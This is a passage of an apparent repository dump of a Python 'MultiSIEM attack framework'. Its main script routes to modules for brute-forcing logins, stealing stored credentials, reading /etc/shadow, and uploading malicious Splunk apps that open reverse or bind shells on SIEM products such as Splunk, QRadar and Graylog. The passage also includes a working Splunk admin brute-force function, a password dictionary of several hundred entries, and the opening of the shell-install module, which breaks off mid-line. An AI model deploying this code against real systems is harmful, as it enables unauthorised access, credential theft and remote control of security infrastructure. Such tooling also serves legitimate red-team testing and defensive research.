default_web_credentials 24 | from graylog.testcredentialsgraylog import default_ssh_credentials 25 | from graylog.obtainmongodbcredentials import test_mongo_credentials 26 | from graylog.obtaincredentialsrestapi import obtain_ldap_credentials 27 | from graylog.alarmcallback import alarm_callback 28 | from graylog.obtaininputsrestapi import obtain_inputs 29 | 30 | from ossim.bruteforceossim import ossim_brute 31 | from ossim.obtainconfigossim import ossim_config 32 | from ossim.maliciousaction import create_policy 33 | 34 | from scanning import input_ip 35 | from scanning import input_port 36 | from scanning import input_net 37 | from scanning import scan_network 38 | from scanning import scan_host 39 | 40 | from splunk.obtainsysteminfo import obtain_system_info 41 | from splunk.obtainpwds import obtain_credentials 42 | from splunk.installshell import install_app 43 | from splunk.bruteforcesplunk import bruteforce_splunk 44 | from splunk.readfile import read_file 45 | from splunk.obtainsplunkinfo import obtain_splunk_info 46 | from splunk.testovacredentials import test_ova_credentials 47 | 48 | from qradar.bruteforceqradar import qradar_brute 49 | from qradar.apikeybruteqradar import qradar_apikeybrute 50 | from qradar.obtainqradarinfo import qradar_info 51 | from qradar.userdbqradar import qradar_usersdb 52 | 53 | from mcafee.bruteforcemcafee import mcafee_brute 54 | from mcafee.bruteforcessh import mcafee_ssh_brute 55 | from mcafee.obtainsysteminfo import mcafee_ssh_info 56 | from mcafee.obtainwebinfo import mcafee_webinfo 57 | from mcafee.obtainuserssystem import mcafee_users_server 58 | 59 | from siemonster.bfssh_smonster import smonster_ssh_bf 60 | from siemonster.systeminfo_smonster import smonster_ssh_info 61 | from siemonster.usersso_smonster import smonster_users_server 62 | 63 | from elasticsiem.bruteforcessh import elastic_ssh_brute 64 | from elasticsiem.sysinfo_elastic import elastic_ssh_info 65 | 66 | # %%%%%%% Context Variables %%%%%%%# 67 | 68 | VERSION = 1.1 69 | SEPARATOR = "[*] {0} [*]".format('=' * 110) 70 | 71 | # %%%%%%%%%%% Functions %%%%%%%%%%%# 72 | 73 | 74 | def banner(): 75 | b = """ 76 | _____ _____ ______ __ __ ______ _ 77 | / ____|_ _| ____| \/ | | ____| | | 78 | | (___ | | | |__ | \ / |___ | |__ _ __ __ _ _ __ ___ _____ _____ _ __| | __ 79 | \___ \ | | | __| | |\/| / __| | __| '__/ _` | '_ ` _ \ / _ \ \ /\ / / _ \| '__| |/ / 80 | ____) |_| |_| |____| | | \__ \ | | | | | (_| | | | | | | __/\ V V / (_) | | | < 81 | |_____/|_____|______|_| |_|___/ |_| |_| \__,_|_| |_| |_|\___| \_/\_/ \___/|_| |_|\_\ 82 | 83 | 84 | MultiSIEM Modular Python3 Attack Framework 85 | By ElevenPaths https://www.elevenpaths.com/ 86 | Usage: python3 ./siemsframework.py 87 | """ 88 | print(Fore.CYAN + Style.BRIGHT + b) 89 | 90 | # %%%%%%%%%% Menu %%%%%%%%%# 91 | 92 | 93 | def menus(menu): 94 | globals.messages(1, '') 95 | if menu == 1: 96 | options = enumerate(globals.main_menu, 1) 97 | elif menu == "Splunk": 98 | options = enumerate(globals.splunk_menu, 1) 99 | elif menu == "Graylog": 100 | options = enumerate(globals.graylog_menu, 1) 101 | elif menu == "OSSIM": 102 | options = enumerate(globals.ossim_menu, 1) 103 | elif menu == "QRadar": 104 | options = enumerate(globals.qradar_menu, 1) 105 | elif menu == "McAfee": 106 | options = enumerate(globals.mcafee_menu, 1) 107 | elif menu == "SIEMonster": 108 | options = enumerate(globals.smonster_menu, 1) 109 | elif menu == "ElasticSIEM": 110 | options = enumerate(globals.elastic_menu, 1) 111 | elif menu == 2: 112 | options = enumerate(globals.app_menu, 1) 113 | 114 | for c, i in options: 115 | print(Fore.GREEN + Style.BRIGHT + '\t[' + str(c) + '] ' + i) 116 | 117 | if menu == 1: 118 | print(Fore.GREEN + Style.BRIGHT + '\t[X] Exit') 119 | elif menu == 2: 120 | print(Fore.GREEN + Style.BRIGHT + '\t[X] Return to Attack Menu') 121 | else: 122 | print(Fore.GREEN + Style.BRIGHT + '\t[X] Return to Main Menu') 123 | print(Fore.GREEN + Style.BRIGHT + SEPARATOR) 124 | 125 | choice = input( 126 | Fore.CYAN + Style.NORMAL + "[!] Enter your selection: " + Style.RESET_ALL) 127 | return choice 128 | 129 | 130 | # %%%%%%%%%% Menu Choices %%%%%%%%%# 131 | 132 | 133 | def attack_choice(siemdetected, ip, port): 134 | choiceerror = 0 135 | attackchoice = menus(siemdetected) 136 | 137 | if siemdetected == "Splunk": 138 | splunk_attack(attackchoice, ip, port) 139 | elif siemdetected == "Graylog": 140 | graylog_attack(attackchoice, ip, port) 141 | elif siemdetected == "OSSIM": 142 | ossim_attack(attackchoice, ip, port) 143 | elif siemdetected == "QRadar": 144 | qradar_attack(attackchoice, ip, port) 145 | elif siemdetected == "McAfee": 146 | mcafee_attack(attackchoice, ip, port) 147 | elif siemdetected == "SIEMonster": 148 | smonster_attack(attackchoice, ip, port) 149 | elif siemdetected == "ElasticSIEM": 150 | elastic_attack(attackchoice, ip, port) 151 | elif attackchoice.lower() == "x": 152 | main_choice() 153 | else: 154 | globals.messages(2) 155 | sleep(1) 156 | attack_choice(siemdetected, ip, port) 157 | choiceerror = 1 158 | 159 | if attackchoice != "0" and choiceerror != 1: # Not return and not error 160 | choice3 = input( 161 | Fore.CYAN + Style.BRIGHT + 162 | "[!] Do you want to return to the attack menu (Y/N): " + 163 | Style.RESET_ALL) 164 | if choice3.lower() == "y": 165 | attack_choice(siemdetected, ip, port) 166 | else: 167 | main_choice() 168 | 169 | 170 | def app_choice(siemdetected, ip, port): 171 | appchoice = menus(2) 172 | if siemdetected == "Splunk": 173 | app_splunk_attack(appchoice, ip, port) 174 | elif appchoice.lower() == "x": # Return 175 | attack_choice(siemdetected, ip, port) 176 | 177 | 178 | def splunk_attack(attackchoice, ip, port): 179 | if attackchoice == "1": # Bruteforce Splunk Admin 180 | bruteforce_splunk(ip, port) 181 | elif attackchoice == "2": # Obtain Server Information 182 | obtain_splunk_info(ip, port) 183 | elif attackchoice == "3": # Obtain System Information 184 | obtain_system_info(ip, port) 185 | elif attackchoice == "4": # Obtain Splunk Passwords 186 | obtain_credentials(ip, port) 187 | elif attackchoice == "5": # Read /etc/shadow 188 | read_file(ip, port) 189 | elif attackchoice == "7": # Upload Malicious App 190 | app_choice("Splunk", ip, port) 191 | elif attackchoice == "8": # Test OVA Credentials 192 | test_ova_credentials(ip) 193 | 194 | 195 | def app_splunk_attack(appchoice, ip, port): 196 | appname = None 197 | if appchoice == "1": # Linux Reverse Shell 198 | appname = "rshell.tar.gz" 199 | elif appchoice == "2": # Linux Bind Shell 200 | appname = "bshell.tar.gz" 201 | elif appchoice == "3": # Windows Reverse Shell 202 | appname = "wrshell.tar.gz" 203 | elif appchoice == "4": # Windows Bind Shell 204 | appname = "wbshell.tar.gz" 205 | elif appchoice == "5": # Windows UF Add User 206 | appname = "wadduser.tar.gz" 207 | elif appchoice == "6": # Windows UF Bind Shell 208 | appname = "wbshellexe.tar.gz" 209 | 210 | if appchoice != "0" and appname: # Not return and valid app selection 211 | install_app(ip, port, appname) 212 | choice3 = input( 213 | Fore.CYAN + Style.BRIGHT + 214 | "[!] Do you want to return to the attack menu (Y/N): " 215 | + Style.RESET_ALL) 216 | 217 | if choice3.lower() == "y": 218 | attack_choice('Splunk', ip, port) 219 | else: 220 | main_choice() 221 | 222 | 223 | def graylog_attack(attackchoice, ip, port): 224 | if attackchoice == "1": # Bruteforce Graylog 225 | graylog_brute(ip, port) 226 | elif attackchoice == "2": # Test Default Credentials 227 | default_web_credentials(ip, port) 228 | default_ssh_credentials(ip) 229 | elif attackchoice == "3": # Test MongoDB 230 | test_mongo_credentials(ip) 231 | elif attackchoice == "4": # Obtain credentials from API 232 | obtain_ldap_credentials(ip, port) 233 | elif attackchoice == "5": # Inputs from API 234 | obtain_inputs(ip, port) 235 | elif attackchoice == "6": # Alarm Callback 236 | alarm_callback(ip, port) 237 | 238 | 239 | def ossim_attack(attackchoice, ip, port): 240 | if attackchoice == "1": # Bruteforce OSSIM 241 | ossim_brute(ip, port) 242 | elif attackchoice == "2": # Obtain Configuration 243 | ossim_config(ip, port) 244 | elif attackchoice == "3": # Malicious Policy and Action 245 | create_policy(ip, port) 246 | 247 | 248 | def qradar_attack(attackchoice, ip, port): 249 | if attackchoice == "1": # Bruteforce QRadar 250 | qradar_brute(ip, port) 251 | elif attackchoice == "2": # API Bruteforce QRadar 252 | qradar_apikeybrute(ip, port) 253 | elif attackchoice == "3": # Obtain Information QRadar 254 | qradar_info(ip, port) 255 | elif attackchoice == "4": # Obtain Usernames of Ariel DB QRadar 256 | qradar_usersdb(ip, port) 257 | 258 | 259 | def mcafee_attack(attackchoice, ip, port): 260 | if attackchoice == '1': 261 | mcafee_brute(ip, port) 262 | elif attackchoice == '2': 263 | mcafee_ssh_brute(ip) 264 | elif attackchoice == '3': 265 | mcafee_ssh_info(ip) 266 | elif attackchoice == '4': 267 | mcafee_webinfo(ip, port) 268 | elif attackchoice == '5': 269 | mcafee_users_server(ip) 270 | 271 | 272 | def smonster_attack(attackchoice, ip, port): 273 | if attackchoice == '1': 274 | smonster_ssh_bf(ip) 275 | elif attackchoice == '2': 276 | smonster_ssh_info(ip) 277 | elif attackchoice == '3': 278 | smonster_users_server(ip) 279 | 280 | 281 | def elastic_attack(attackchoice, ip, port): 282 | if attackchoice == '1': 283 | elastic_ssh_brute(ip) 284 | elif attackchoice == '2': 285 | elastic_ssh_info(ip) 286 | elif attackchoice == '3': 287 | smonster_users_server(ip) 288 | 289 | 290 | def scan_detect(): 291 | ip = input_ip() 292 | port = input_port() 293 | siemdetected = '' 294 | if (ip and port) != '': 295 | siemdetected = scan_host(ip, port) 296 | else: 297 | globals.messages(3) 298 | sleep(1) 299 | main_choice() 300 | 301 | choice2 = input( 302 | Fore.CYAN + Style.BRIGHT + "[!] Do you want to launch the " + 303 | siemdetected + " attack module (Y/N): " + Style.RESET_ALL) 304 | 305 | if choice2.lower() == "y": 306 | if port == 0 and siemdetected == "Splunk": 307 | attack_choice(siemdetected, ip, '8089') 308 | elif port == 0 and siemdetected == "Graylog": 309 | attack_choice(siemdetected, ip, '9000') 310 | elif port == 0 and ( 311 | siemdetected == "OSSIM" or siemdetected == "QRadar" 312 | or siemdetected == "McAfee" or siemdetected == "SIEMonster"): 313 | attack_choice(siemdetected, ip, '443') 314 | else: 315 | attack_choice(siemdetected, ip, port) 316 | else: 317 | main_choice() 318 | 319 | 320 | def find_siem(): 321 | siemsdetected = {} 322 | siemnet = input_net() 323 | 324 | if re.search(globals.net_val, siemnet): 325 | ips = scan_network(siemnet) 326 | else: 327 | globals.messages(4) 328 | sleep(1) 329 | main_choice() 330 | globals.messages(6) 331 | 332 | for host in ips: 333 | siemdetected = scan_host(host, '0') 334 | siemsdetected[host] = siemdetected 335 | 336 | siemchoice = input( 337 | Fore.CYAN + Style.BRIGHT + 338 | "[!] Enter the IP address of the SIEM to attack: " + 339 | Style.RESET_ALL) 340 | portchoice = input( 341 | Fore.CYAN + Style.BRIGHT + "[!] Enter the port of the SIEM to attack: " + 342 | Style.RESET_ALL) 343 | 344 | choice2 = input( 345 | Fore.CYAN + Style.BRIGHT + "[!] Do you want to launch the " + 346 | siemsdetected[siemchoice] + " attack module (Y/N): " + Style.RESET_ALL) 347 | 348 | if choice2.lower() == "y": 349 | attack_choice(siemsdetected[siemchoice], siemchoice, portchoice) 350 | else: 351 | main_choice() 352 | 353 | 354 | def main_choice(): 355 | choice = menus(1) 356 | 357 | if choice == "1": # Scan and Detect SIEM 358 | scan_detect() 359 | elif choice == "2": # Find SIEM on the Network 360 | find_siem() 361 | elif choice.upper() == "X": 362 | quit() 363 | else: 364 | globals.messages(2) 365 | main_choice() 366 | 367 | 368 | # %%%%%%%%%% Main %%%%%%%%%# 369 | 370 | def main(): 371 | os.system('cls' if os.name == 'nt' else 'clear') 372 | colorama.init(autoreset="True") 373 | banner() 374 | main_choice() 375 | 376 | 377 | if __name__ == '__main__': 378 | main() 379 | 380 | # %%%%%%%%%% The End %%%%%%%%%%# 381 | -------------------------------------------------------------------------------- /splunk/bruteforcesplunk.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | # Splunk Login Bruteforce 4 | 5 | # %%%%%%%%%%% Libraries %%%%%%%%%%%# 6 | 7 | 8 | import os 9 | import sys 10 | import globals 11 | import splunklib.client as client 12 | 13 | sys.path.append('../') 14 | 15 | # %%%%%%%%%%% Functions %%%%%%%%%%%# 16 | 17 | 18 | def bruteforce_splunk(ip, port): 19 | 20 | username = "admin" 21 | __location__ = os.path.realpath(os.path.join( 22 | os.getcwd(), os.path.dirname(__file__))) 23 | file = open(os.path.join(__location__, 'dict.txt')) 24 | bfs = 0 25 | free = 0 26 | defaultpass = 0 27 | 28 | # First Try Default Password "changeme" and Splunk Free Version 29 | 30 | try: 31 | client.connect(host=ip, port=port, username=username, password="") 32 | free = 1 33 | except: 34 | pass 35 | try: 36 | client.connect( 37 | host=ip, port=port, username=username, password="changeme") 38 | defaultpass = 1 39 | except: 40 | pass 41 | 42 | if (free and defaultpass) == 0: 43 | for line in file: 44 | splunk_password = line.strip('\n\r') 45 | 46 | try: 47 | client.connect( 48 | host=ip, port=port, 49 | username=username, password=splunk_password) 50 | bfs = 1 51 | break 52 | except: 53 | pass 54 | 55 | if (bfs or free or defaultpass) == 1: 56 | globals.messages(7) 57 | if free == 1: 58 | globals.messages(9, ['admin', 'no password']) 59 | file.close() 60 | elif defaultpass == 1: 61 | globals.messages(9, ['admin', 'changeme']) 62 | file.close() 63 | else: 64 | globals.messages(9, ['admin', splunk_password]) 65 | file.close() 66 | 67 | else: 68 | globals.messages(8) 69 | file.close() 70 | 71 | # %%%%%%%%%% The End %%%%%%%%%%# 72 | -------------------------------------------------------------------------------- /splunk/bshell.tar.gz: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ElevenPaths/siemframework/8b317d152f8ae80565a4ee00106c73ee0e1a3381/splunk/bshell.tar.gz -------------------------------------------------------------------------------- /splunk/dict.txt: -------------------------------------------------------------------------------- 1 | splunk 2 | password 3 | p4ssw0rd 4 | SPLUNK 5 | changeme 6 | admin 7 | splunk123 8 | splunk1 9 | splunk2 10 | splunk3 11 | splunk4 12 | splunk5 13 | splunk6 14 | splunk7 15 | splunk8 16 | splunk9 17 | splunk0 18 | splunk! 19 | splunk@ 20 | splunk# 21 | splunk$ 22 | splunk% 23 | splunk^ 24 | splunk& 25 | splunk* 26 | splunk? 27 | Splunk1 28 | Splunk2 29 | Splunk3 30 | Splunk4 31 | Splunk5 32 | Splunk6 33 | Splunk7 34 | Splunk8 35 | Splunk9 36 | Splunk0 37 | mellivora123 38 | Splunk! 39 | Splunk@ 40 | Splunk# 41 | Splunk$ 42 | Splunk% 43 | Splunk^ 44 | Splunk& 45 | Splunk* 46 | Splunk? 47 | $plunk1 48 | $plunk2 49 | $plunk3 50 | $plunk4 51 | $plunk5 52 | $plunk6 53 | $plunk7 54 | $plunk8 55 | $plunk9 56 | $plunk0 57 | $plunk! 58 | $plunk@ 59 | $plunk# 60 | $plunk$ 61 | $plunk% 62 | $plunk^ 63 | $plunk& 64 | $plunk* 65 | $plunk? 66 | 5plunk1 67 | 5plunk2 68 | 5plunk3 69 | 5plunk4 70 | 5plunk5 71 | 5plunk6 72 | 5plunk7 73 | 5plunk8 74 | 5plunk9 75 | 5plunk0 76 | 5plunk! 77 | 5plunk@ 78 | 5plunk# 79 | 5plunk$ 80 | 5plunk% 81 | 5plunk^ 82 | 5plunk& 83 | 5plunk* 84 | 5plunk? 85 | sPLUNK1 86 | sPLUNK2 87 | sPLUNK3 88 | sPLUNK4 89 | sPLUNK5 90 | sPLUNK6 91 | sPLUNK7 92 | sPLUNK8 93 | sPLUNK9 94 | sPLUNK0 95 | sPLUNK! 96 | sPLUNK@ 97 | sPLUNK# 98 | sPLUNK$ 99 | sPLUNK% 100 | sPLUNK^ 101 | sPLUNK& 102 | sPLUNK* 103 | sPLUNK? 104 | SPLUNK1 105 | SPLUNK2 106 | SPLUNK3 107 | SPLUNK4 108 | SPLUNK5 109 | SPLUNK6 110 | SPLUNK7 111 | SPLUNK8 112 | SPLUNK9 113 | SPLUNK0 114 | SPLUNK! 115 | SPLUNK@ 116 | SPLUNK# 117 | SPLUNK$ 118 | SPLUNK% 119 | SPLUNK^ 120 | SPLUNK& 121 | SPLUNK* 122 | SPLUNK? 123 | $PLUNK1 124 | $PLUNK2 125 | $PLUNK3 126 | $PLUNK4 127 | $PLUNK5 128 | $PLUNK6 129 | $PLUNK7 130 | $PLUNK8 131 | $PLUNK9 132 | $PLUNK0 133 | $PLUNK! 134 | $PLUNK@ 135 | $PLUNK# 136 | $PLUNK$ 137 | $PLUNK% 138 | $PLUNK^ 139 | $PLUNK& 140 | $PLUNK* 141 | $PLUNK? 142 | 5PLUNK1 143 | 5PLUNK2 144 | 5PLUNK3 145 | 5PLUNK4 146 | 5PLUNK5 147 | 5PLUNK6 148 | 5PLUNK7 149 | 5PLUNK8 150 | 5PLUNK9 151 | 5PLUNK0 152 | 5PLUNK! 153 | 5PLUNK@ 154 | 5PLUNK# 155 | 5PLUNK$ 156 | 5PLUNK% 157 | 5PLUNK^ 158 | 5PLUNK& 159 | 5PLUNK* 160 | 5PLUNK? 161 | splunk11 162 | splunk12 163 | splunk13 164 | splunk14 165 | splunk15 166 | splunk16 167 | splunk17 168 | splunk18 169 | splunk19 170 | splunk10 171 | splunk1! 172 | splunk1@ 173 | splunk1# 174 | splunk1$ 175 | splunk1% 176 | splunk1^ 177 | splunk1& 178 | splunk1* 179 | splunk1? 180 | Splunk11 181 | Splunk12 182 | Splunk13 183 | Splunk14 184 | Splunk15 185 | Splunk16 186 | Splunk17 187 | Splunk18 188 | Splunk19 189 | Splunk10 190 | Splunk1! 191 | Splunk1@ 192 | Splunk1# 193 | Splunk1$ 194 | Splunk1% 195 | Splunk1^ 196 | Splunk1& 197 | Splunk1* 198 | Splunk1? 199 | $plunk11 200 | $plunk12 201 | $plunk13 202 | $plunk14 203 | $plunk15 204 | $plunk16 205 | $plunk17 206 | $plunk18 207 | $plunk19 208 | $plunk10 209 | $plunk1! 210 | $plunk1@ 211 | $plunk1# 212 | $plunk1$ 213 | $plunk1% 214 | $plunk1^ 215 | $plunk1& 216 | $plunk1* 217 | $plunk1? 218 | 5plunk11 219 | 5plunk12 220 | 5plunk13 221 | 5plunk14 222 | 5plunk15 223 | 5plunk16 224 | 5plunk17 225 | 5plunk18 226 | 5plunk19 227 | 5plunk10 228 | 5plunk1! 229 | 5plunk1@ 230 | 5plunk1# 231 | 5plunk1$ 232 | 5plunk1% 233 | 5plunk1^ 234 | 5plunk1& 235 | 5plunk1* 236 | 5plunk1? 237 | splunk121 238 | splunk122 239 | splunk123 240 | splunk124 241 | splunk125 242 | splunk126 243 | splunk127 244 | splunk128 245 | splunk129 246 | splunk120 247 | splunk12! 248 | splunk12@ 249 | splunk12# 250 | splunk12$ 251 | splunk12% 252 | splunk12^ 253 | splunk12& 254 | splunk12* 255 | splunk12? 256 | Splunk121 257 | Splunk122 258 | Splunk123 259 | Splunk124 260 | Splunk125 261 | Splunk126 262 | Splunk127 263 | Splunk128 264 | Splunk129 265 | Splunk120 266 | Splunk12! 267 | Splunk12@ 268 | Splunk12# 269 | Splunk12$ 270 | Splunk12% 271 | Splunk12^ 272 | Splunk12& 273 | Splunk12* 274 | Splunk12? 275 | $plunk121 276 | $plunk122 277 | $plunk123 278 | $plunk124 279 | $plunk125 280 | $plunk126 281 | $plunk127 282 | $plunk128 283 | $plunk129 284 | $plunk120 285 | $plunk12! 286 | $plunk12@ 287 | $plunk12# 288 | $plunk12$ 289 | $plunk12% 290 | $plunk12^ 291 | $plunk12& 292 | $plunk12* 293 | $plunk12? 294 | 5plunk121 295 | 5plunk122 296 | 5plunk123 297 | 5plunk124 298 | 5plunk125 299 | 5plunk126 300 | 5plunk127 301 | 5plunk128 302 | 5plunk129 303 | 5plunk120 304 | 5plunk12! 305 | 5plunk12@ 306 | 5plunk12# 307 | 5plunk12$ 308 | 5plunk12% 309 | 5plunk12^ 310 | 5plunk12& 311 | 5plunk12* 312 | 5plunk12? 313 | splunk1231 314 | splunk1232 315 | splunk1233 316 | splunk1234 317 | splunk1235 318 | splunk1236 319 | splunk1237 320 | splunk1238 321 | splunk1239 322 | splunk1230 323 | splunk123! 324 | splunk123@ 325 | splunk123# 326 | splunk123$ 327 | splunk123% 328 | splunk123^ 329 | splunk123& 330 | splunk123* 331 | splunk123? 332 | Splunk1231 333 | Splunk1232 334 | Splunk1233 335 | Splunk1234 336 | Splunk1235 337 | Splunk1236 338 | Splunk1237 339 | Splunk1238 340 | Splunk1239 341 | Splunk1230 342 | Splunk123! 343 | Splunk123@ 344 | Splunk123# 345 | Splunk123$ 346 | Splunk123% 347 | Splunk123^ 348 | Splunk123& 349 | Splunk123* 350 | Splunk123? 351 | $plunk1231 352 | $plunk1232 353 | $plunk1233 354 | $plunk1234 355 | $plunk1235 356 | $plunk1236 357 | $plunk1237 358 | $plunk1238 359 | $plunk1239 360 | $plunk1230 361 | $plunk123! 362 | $plunk123@ 363 | $plunk123# 364 | $plunk123$ 365 | $plunk123% 366 | $plunk123^ 367 | $plunk123& 368 | $plunk123* 369 | $plunk123? 370 | 5plunk1231 371 | 5plunk1232 372 | 5plunk1233 373 | 5plunk1234 374 | 5plunk1235 375 | 5plunk1236 376 | 5plunk1237 377 | 5plunk1238 378 | 5plunk1239 379 | 5plunk1230 380 | 5plunk123! 381 | 5plunk123@ 382 | 5plunk123# 383 | 5plunk123$ 384 | 5plunk123% 385 | 5plunk123^ 386 | 5plunk123& 387 | 5plunk123* 388 | 5plunk123? 389 | biteme 390 | 1992 391 | london 392 | soccer 393 | william 394 | querty 395 | liverpool 396 | pussy 397 | admin123 398 | whatever 399 | dallas 400 | hockey 401 | test 402 | zaq1zaq1 403 | 1q2w3e 404 | aaaaaa 405 | killer 406 | bandit 407 | ashley 408 | cookie 409 | merlin 410 | trustno1 411 | 1991 412 | ranger 413 | chelsea 414 | banana 415 | jennifer 416 | 1990 417 | amanda 418 | 1989 419 | hunter 420 | nicole 421 | hello 422 | maverick 423 | blahblah 424 | mercedes 425 | corvette 426 | computer 427 | cheese 428 | ferrari 429 | starwars 430 | 1qaz2wsx 431 | andrea 432 | lakers 433 | andrew 434 | 12341234 435 | matthew 436 | robert 437 | 1234 438 | sophie 439 | pepper 440 | joshua 441 | tigger 442 | 55555 443 | jordan 444 | solo 445 | abcdef 446 | letmein 447 | ginger 448 | jessica 449 | 222222 450 | harley 451 | george 452 | summer 453 | thomas 454 | hannah 455 | daniel 456 | buster 457 | baseball 458 | passw0rd 459 | shadow 460 | freedom 461 | bailey 462 | 121212 463 | zxcvbnm 464 | qwerty123 465 | password1 466 | donald 467 | aa123456 468 | charlie 469 | !@#$%^&* 470 | 654321 471 | monkey 472 | 123123 473 | football 474 | abc123 475 | 666666 476 | welcome 477 | admin 478 | princess 479 | iloveyou 480 | qwerty 481 | sunshine 482 | 1234567 483 | 111111 484 | 12345 485 | 12345678 486 | 123456789 487 | password 488 | 123456 489 | admin1 490 | admin2 491 | admin3 492 | admin4 493 | admin5 494 | admin6 495 | admin7 496 | admin8 497 | admin9 498 | admin0 499 | admin! 500 | admin@ 501 | admin# 502 | admin$ 503 | admin% 504 | admin^ 505 | admin& 506 | admin* 507 | admin? 508 | Admin1 509 | Admin2 510 | Admin3 511 | Admin4 512 | Admin5 513 | Admin6 514 | Admin7 515 | Admin8 516 | Admin9 517 | Admin0 518 | Admin! 519 | Admin@ 520 | Admin# 521 | Admin$ 522 | Admin% 523 | Admin^ 524 | Admin& 525 | Admin* 526 | Admin? 527 | @dmin1 528 | @dmin2 529 | @dmin3 530 | @dmin4 531 | @dmin5 532 | @dmin6 533 | @dmin7 534 | @dmin8 535 | @dmin9 536 | @dmin0 537 | @dmin! 538 | @dmin@ 539 | @dmin# 540 | @dmin$ 541 | @dmin% 542 | @dmin^ 543 | @dmin& 544 | @dmin* 545 | @dmin? 546 | 4dmin1 547 | 4dmin2 548 | 4dmin3 549 | 4dmin4 550 | 4dmin5 551 | 4dmin6 552 | 4dmin7 553 | 4dmin8 554 | 4dmin9 555 | 4dmin0 556 | 4dmin! 557 | 4dmin@ 558 | 4dmin# 559 | 4dmin$ 560 | 4dmin% 561 | 4dmin^ 562 | 4dmin& 563 | 4dmin* 564 | 4dmin? 565 | admin1231 566 | admin1232 567 | admin1233 568 | admin1234 569 | admin1235 570 | admin1236 571 | admin1237 572 | admin1238 573 | admin1239 574 | admin1230 575 | admin123! 576 | admin123@ 577 | admin123# 578 | admin123$ 579 | admin123% 580 | admin123^ 581 | admin123& 582 | admin123* 583 | admin123? 584 | Admin1231 585 | Admin1232 586 | Admin1233 587 | Admin1234 588 | Admin1235 589 | Admin1236 590 | Admin1237 591 | Admin1238 592 | Admin1239 593 | Admin1230 594 | Admin123! 595 | Admin123@ 596 | Admin123# 597 | Admin123$ 598 | Admin123% 599 | Admin123^ 600 | Admin123& 601 | Admin123* 602 | Admin123? 603 | @dmin1231 604 | @dmin1232 605 | @dmin1233 606 | @dmin1234 607 | @dmin1235 608 | @dmin1236 609 | @dmin1237 610 | @dmin1238 611 | @dmin1239 612 | @dmin1230 613 | @dmin123! 614 | @dmin123@ 615 | @dmin123# 616 | @dmin123$ 617 | @dmin123% 618 | @dmin123^ 619 | @dmin123& 620 | @dmin123* 621 | @dmin123? 622 | 4dmin1231 623 | 4dmin1232 624 | 4dmin1233 625 | 4dmin1234 626 | 4dmin1235 627 | 4dmin1236 628 | 4dmin1237 629 | 4dmin1238 630 | 4dmin1239 631 | 4dmin1230 632 | 4dmin123! 633 | 4dmin123@ 634 | 4dmin123# 635 | 4dmin123$ 636 | 4dmin123% 637 | 4dmin123^ 638 | 4dmin123& 639 | 4dmin123* 640 | 4dmin123? 641 | admin121 642 | admin122 643 | admin123 644 | admin124 645 | admin125 646 | admin126 647 | admin127 648 | admin128 649 | admin129 650 | admin120 651 | admin12! 652 | admin12@ 653 | admin12# 654 | admin12$ 655 | admin12% 656 | admin12^ 657 | admin12& 658 | admin12* 659 | admin12? 660 | Admin121 661 | Admin122 662 | Admin123 663 | Admin124 664 | Admin125 665 | Admin126 666 | Admin127 667 | Admin128 668 | Admin129 669 | Admin120 670 | Admin12! 671 | Admin12@ 672 | Admin12# 673 | Admin12$ 674 | Admin12% 675 | Admin12^ 676 | Admin12& 677 | Admin12* 678 | Admin12? 679 | @dmin121 680 | @dmin122 681 | @dmin123 682 | @dmin124 683 | @dmin125 684 | @dmin126 685 | @dmin127 686 | @dmin128 687 | @dmin129 688 | @dmin120 689 | @dmin12! 690 | @dmin12@ 691 | @dmin12# 692 | @dmin12$ 693 | @dmin12% 694 | @dmin12^ 695 | @dmin12& 696 | @dmin12* 697 | @dmin12? 698 | 4dmin121 699 | 4dmin122 700 | 4dmin123 701 | 4dmin124 702 | 4dmin125 703 | 4dmin126 704 | 4dmin127 705 | 4dmin128 706 | 4dmin129 707 | 4dmin120 708 | 4dmin12! 709 | 4dmin12@ 710 | 4dmin12# 711 | 4dmin12$ 712 | 4dmin12% 713 | 4dmin12^ 714 | 4dmin12& 715 | 4dmin12* 716 | 4dmin12? 717 | admin1231 718 | admin1232 719 | admin1233 720 | admin1234 721 | admin1235 722 | admin1236 723 | admin1237 724 | admin1238 725 | admin1239 726 | admin1230 727 | admin123! 728 | admin123@ 729 | admin123# 730 | admin123$ 731 | admin123% 732 | admin123^ 733 | admin123& 734 | admin123* 735 | admin123? 736 | Admin1231 737 | Admin1232 738 | Admin1233 739 | Admin1234 740 | Admin1235 741 | Admin1236 742 | Admin1237 743 | Admin1238 744 | Admin1239 745 | Admin1230 746 | Admin123! 747 | Admin123@ 748 | Admin123# 749 | Admin123$ 750 | Admin123% 751 | Admin123^ 752 | Admin123& 753 | Admin123* 754 | Admin123? 755 | @dmin1231 756 | @dmin1232 757 | @dmin1233 758 | @dmin1234 759 | @dmin1235 760 | @dmin1236 761 | @dmin1237 762 | @dmin1238 763 | @dmin1239 764 | @dmin1230 765 | @dmin123! 766 | @dmin123@ 767 | @dmin123# 768 | @dmin123$ 769 | @dmin123% 770 | @dmin123^ 771 | @dmin123& 772 | @dmin123* 773 | @dmin123? 774 | 4dmin1231 775 | 4dmin1232 776 | 4dmin1233 777 | 4dmin1234 778 | 4dmin1235 779 | 4dmin1236 780 | 4dmin1237 781 | 4dmin1238 782 | 4dmin1239 783 | 4dmin1230 784 | 4dmin123! 785 | 4dmin123@ 786 | 4dmin123# 787 | 4dmin123$ 788 | 4dmin123% 789 | 4dmin123^ 790 | 4dmin123& 791 | 4dmin123* 792 | 4dmin123? 793 | -------------------------------------------------------------------------------- /splunk/installshell.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | # Install Reverse Shell or Bind Shell from App 4 | 5 | # %%%%%%%%%%% Libraries %%%%%%%%%%%# 6 | 7 | import getpass 8 | import globals 9 | import os 10 | import sys 11 | import tarfile 12 | import threading 13 | import splunklib.binding as binding 14 | from colorama import Fore, Style 15 | from xml.etree import ElementTree 16 | from http.server import SimpleHTTPRequestHandler 17 | from http.server import HTTPServer 18 | 19 | sys.path.insert(0, os.path.join(os.path.dirname(__file__), "..", "..")) 20 | 21 | # %%%%%%%%%%% Constants %%%%%%%%%%%# 22 | 23 | SEPARATOR = "[*] {0} [*]".format('=' * 110) 24 | 25 | # %%%%%%%%%%% Functions %%%%%%%%%%%# 26 | 27 | 28 | def install_app(ip, port, appname): 29 | splunk_username = input("[!] Enter Splunk Admin (Default admin): ") 30 | splunk_password = getpass.getpass("[!] Enter Password: ") 31 | local_ip = input("[!] Enter your 